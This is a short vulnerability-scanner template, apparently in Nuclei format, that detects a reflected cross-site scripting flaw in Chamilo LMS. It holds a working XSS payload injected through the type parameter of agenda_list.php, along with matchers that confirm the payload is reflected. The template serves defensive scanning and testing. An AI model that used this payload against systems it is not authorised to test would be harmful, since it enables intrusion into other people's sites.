id: chamilo-lms-xss

info:
  name: Chamilo LMS Cross Site Scripting
  author: nithissh
  severity: medium
  description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/
  tags: xss,chamilo

requests:
  - method: GET
    path:
      - '{{BaseURL}}/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'agenda_js.php?type=xss" onmouseover=alert(document.domain)'
      - type: status
        status:
          - 200
      - type: word
        part: header
        words:
          - "text/html"
